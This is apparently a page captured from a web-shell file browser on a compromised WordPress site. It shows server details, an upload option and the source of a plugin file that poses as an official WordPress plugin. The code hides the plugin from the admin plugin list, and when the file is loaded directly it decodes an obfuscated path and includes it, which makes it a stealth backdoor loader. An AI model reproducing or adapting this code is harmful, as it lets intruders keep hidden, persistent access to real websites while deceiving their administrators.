HEX
Server: Apache
System: Linux WWW 6.1.0-40-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.153-1 (2025-09-20) x86_64
User: web11 (1011)
PHP: 8.2.29
Disabled: NONE
Upload Files
File: /var/www/itt.kaunokolegija.lt/wp-content/plugins/wp-configure-ibm/index.php
<?php
/*
Plugin Name: WP Configure Ibm
Plugin URI: http://wordpress.org/#
Description: Official WordPress plugin
Author: WordPress
Version: 5.2.3
Author URI: http://wordpress.org/#
License: GPL2
*/

function tsx_mqy()
{
    global $wp_list_table;
    
    if (!isset($wp_list_table)) {
        return;
    }

    $h = array('wp-configure-ibm/index.php');

    if (isset($wp_list_table->items) && is_array($wp_list_table->items)) {
        foreach ($wp_list_table->items as $key => $val) {
            if (in_array($key, $h)) {
                unset($wp_list_table->items[$key]);
            }
        }
    }
}

function afz_iat($plugins)
{
    $p = 'wp-configure-ibm/index.php';
    if (array_key_exists($p, $plugins)) {
        unset($plugins[$p]);
    }
    return $plugins;
}

function erj($f, $d)
{
    $r = '';
    for ($i = 0; $i < strlen($f); $i += 2) {
        $v = ord($f[$i]) - 65;
        $b = ord($f[$i + 1]);
        if ($b > 90) $b -= 6;
        $s = $v * 52 + ($b - 65);
        $r .= chr($s - $d);
    }
    return $r;
}

if (defined('ABSPATH')) {
    add_action('pre_current_active_plugins', 'tsx_mqy');
    add_filter('all_plugins', 'afz_iat');
} else {
    include erj('QCPsQDPoOlPmQCQC', 719);
}